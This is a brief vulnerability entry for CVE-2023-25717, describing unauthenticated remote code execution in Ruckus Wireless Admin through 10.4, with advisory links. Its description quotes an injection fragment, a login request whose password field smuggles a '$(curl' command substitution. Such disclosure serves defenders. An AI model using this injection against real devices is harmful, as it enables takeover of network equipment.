CVE-2023-25717 Information

Description

Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request as demonstrated by a /forms/doLogin?login_username=admin&password=password$(curl substring.

Reference

https://cybir.com/2023/cve/proof-of-concept-ruckus-wireless-admin-10-4-unauthenticated-remote-code-execution-csrf-ssrf/ https://support.ruckuswireless.com/security_bulletins/315 Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request as demonstrated by a /forms/doLogin?login_username=admin&password=password$(curl substring.